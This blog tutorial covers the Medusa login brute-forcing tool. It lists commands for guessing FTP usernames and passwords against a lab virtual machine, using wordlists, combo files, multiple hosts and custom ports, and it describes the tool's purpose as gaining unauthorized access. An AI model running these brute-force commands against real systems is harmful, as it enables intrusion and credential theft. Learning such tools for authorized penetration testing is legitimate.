Hey Folks, in this tutorial we are going to talk about another brute forcing tool called “Medusa“. Medusa is a speedy, parallel, and modular, login brute-force. The goal is to support as many services which allow remote authentication as possible. There are some key features of this tool which you can read below.
Lets take a look 🙂 !!
The tool comes pre-installed in kali linux but still you can install it using following command if you are using any other operating system. Also if you use any android application, then “pkg” command is given below.
apt-get install medusa
or
pkg install medusa
If you get stuck somewhere, you resort to the following command to see the guide of that facility.
medusa -h
You can see all the modules available in this tool by following the command.
medusa -d
As we told you that medusa is an brute force tool used to gain unauthorized access of the services or website by guessing the correct password. For the demonstration purposes we have configured the FTP service on a virtual machine running on port 21. In this case we do not have the idea of both username and password, yet we will try to get the correct credentials. If you do not have dictionary then you can take help of this article. Just you need to replace the location of files and host address and execute it. As you can see that the valid username and password is found after executing the command.
Usage 🙂 !! medusa -h < host address > -U < username list > -P < password list > -M < protocol >
medusa -h 192.168.1.11 -U username.txt -P password.txt -M ftp
If you have user details then you do not need make usernames word list because you can take help of following command.
Usage 🙂 !! medusa -h < host address > -u < username > -P < password list > -M < protocol >.
medusa -h 192.168.1.11 -u shubham -P password.txt -M ftp
Similarly, although this happens rarely, but if you have a password for login instead of a username, you can add the argument “-p” so that the password will remain static.
Usage 🙂 !! medusa -h < host address > -U < username list > -p < password > -M < protocol >.
medusa -h 192.168.1.11 -U username.txt -p neon -M ftp
As we know, the tool is given verbose mode to see additional details in the currently running process.
medusa -h 192.168.1.11 -U username.txt -P password.txt -M ftp -v 6
The combo file can be specified using the “-C” option. The file should contain one entry per line and have the values colon separated in the format host:user:password. If any of the three fields are left empty, the respective information should be provided either as a global value or as a list in a file. Medusa will perform a basic parameter check based on the contents of the first line in the file. The following combinations are possible in the combo file:
Done 🙂 !! As you can see it has found valid username and passwords of three different -2 hosts.
medusa -M ftp -C uplist.txt
If we want to perform brute force attack on multiple hosts at the same time, then we have to use the following command. In the following command we add the “-H” argument to attack brute force on multiple hosts.
medusa -H hosts.txt -U username.txt -P password.txt -M ftp -v 6
If the port has been changed by the administrator then we can add the “-n” argument to the command to perform brute force attack on a specific port or service.
medusa -h 192.168.1.9 -U username.txt -P password.txt -M ftp -n 2121
If you want to save your result as a TXT format file then you can add the “-O” argument to the command to save the entire results.
medusa -h 192.168.1.11 -U username.txt -P password.txt -M ftp -O res.txt
The following command is used to stop the brute force attack after obtaining the first correct username and password.
medusa -h 192.168.1.11 -U username.txt -P password.txt -M ftp -f
Credit : http://www.foofus.net
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.
The gau (Get All URLs) tool is a versatile open-source utility that collects URLs from…
Jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic…
Hey Folks :) !! In this tutorial, we will describe some of the techniques commonly…
Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…
Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…
Hey Folks, we are back today after such a long break, but don't worry we…
This website uses cookies.
View Comments
Howdy! This post could not be written any better!
Reading through this article reminds me of my previous roommate!
He continually kept talking about this. I
most certainly will forward this article to him. Pretty sure
he'll have a great read. Thanks for sharing!